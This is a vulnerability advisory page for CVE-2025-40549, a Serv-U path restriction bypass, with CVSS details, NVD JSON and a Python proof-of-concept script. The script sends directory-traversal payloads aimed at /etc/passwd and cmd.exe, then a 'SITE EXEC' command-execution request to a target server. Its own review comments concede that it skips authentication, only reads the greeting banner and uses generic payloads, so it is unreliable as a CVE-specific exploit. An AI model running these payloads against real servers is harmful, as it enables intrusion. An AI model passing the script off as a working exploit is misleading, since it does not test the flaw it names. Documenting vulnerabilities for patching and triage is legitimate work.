Security Vulnerability Report
CVE-2025-40549 CVSS 9.1 CRITICAL

CVE-2025-40549

Published: 2025-11-18 09:15:52
Last Modified: 2025-12-02 16:37:17

Description

A Path Restriction Bypass vulnerability exists in Serv-U that, when abused, could give a malicious actor with access to admin privileges the ability to execute code on a directory. This issue requires administrative privileges to abuse. On Windows systems, this is scored as medium due to differences in how paths and home directories are handled.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:* - VULNERABLE
Serv-U < 15.5.3 (all affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
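# CVE-2025-40549 PoC - Serv-U Path Restriction Bypass
# This PoC demonstrates the path restriction bypass vulnerability
# Requires administrator privileges to exploit
#
# NOTE(review): as written, this script never authenticates, so it does not
# reach the administrator-only functionality that the advisory describes.
# Each connection sends a single line and prints the first chunk the server
# returns; on an FTP service that is normally the greeting banner, not a reply
# to the line that was sent. The usage example also names port 22 while the
# code sends plaintext FTP-style lines. The output is therefore not evidence
# that a host is vulnerable or patched. For triage, compare the installed
# Serv-U version with the fixed release named in the advisory (15.5.3).
import socket
import sys


def _send_once(target_host, target_port, line, bufsize):
    """Open one TCP connection, send *line*, return the first reply chunk as text."""
    # The context manager closes the socket even if connect/send/recv raises;
    # the original leaked the descriptor on every failure path.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((target_host, target_port))
        sock.send(line.encode())
        return sock.recv(bufsize).decode("utf-8", errors="ignore")


def exploit_serv_u_path_bypass(target_host, target_port, cmd):
    """
    Send a fixed list of path strings, then one command line, to a TCP service.

    For each entry in ``path_payloads`` a new connection is opened, a
    ``CWD <payload>`` line is sent, and up to 1024 bytes of whatever the
    server returns first are printed. Afterwards one more connection sends
    ``SITE EXEC <cmd>`` and prints up to 4096 bytes of the first reply.

    No login is performed and no reply is parsed, so nothing here confirms
    that a path restriction was bypassed or that a command ran.

    Args:
        target_host: Host name or address passed to ``socket.connect``.
        target_port: TCP port passed to ``socket.connect``.
        cmd: Text appended to ``SITE EXEC`` for the final request.

    Returns:
        None. Results and errors are printed to stdout.
    """
    # Generic, long-known traversal strings; none is specific to this CVE.
    path_payloads = [
        "../../../../etc/passwd",
        "../../../../windows/system32/cmd.exe",
        "..\\..\\..\\windows\\system32\\cmd.exe",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2f",  # URL encoded
        "..%c0%af..%c0%af..%c0%af",  # overlong UTF-8 encoding of '/'
    ]

    for payload in path_payloads:
        ftp_command = f"CWD {payload}\r\n"
        try:
            reply = _send_once(target_host, target_port, ftp_command, 1024)
            print(f"[*] Payload: {payload}")
            print(f"[*] Response: {reply}")
        except Exception as e:
            # Best-effort loop: report the failure and move to the next entry.
            print(f"[!] Error with payload {payload}: {str(e)}")

    admin_payload = f"SITE EXEC {cmd}"
    print("\n[*] Attempting admin command execution...")
    try:
        reply = _send_once(target_host, target_port, admin_payload, 4096)
        # The original printed "Command executed" unconditionally. Only the
        # send is known to have happened, so the message now says that.
        print(f"[*] Command sent (execution not confirmed): {cmd}")
        print(f"[*] Response: {reply}")
    except Exception as e:
        print(f"[!] Command execution failed: {str(e)}")


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve_2025_40549_poc.py <target_host> <port> <command>")
        print("Example: python cve_2025_40549_poc.py 192.168.1.100 22 'whoami'")
        sys.exit(1)

    target_host = sys.argv[1]
    target_port = int(sys.argv[2])
    cmd = sys.argv[3]

    print(f"[*] Targeting Serv-U server: {target_host}:{target_port}")
    print("[*] CVE-2025-40549 Path Restriction Bypass PoC")
    print("=" * 60)
    exploit_serv_u_path_bypass(target_host, target_port, cmd)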

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40549", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:52.347", "lastModified": "2025-12-02T16:37:16.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Path Restriction Bypass vulnerability exists in Serv-U that when abused, could give a malicious actor with access to admin privileges the ability to execute code on a directory. \n\nThis issue requires administrative privileges to abuse. On Windows systems, this scored as medium due to differences in how paths and home directories are handled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.5.3", "matchCriteriaId": "5536873C-698D-4936-AA0C-63D0BE2CD3E2"}]}]}], "references": [{"url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40549", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}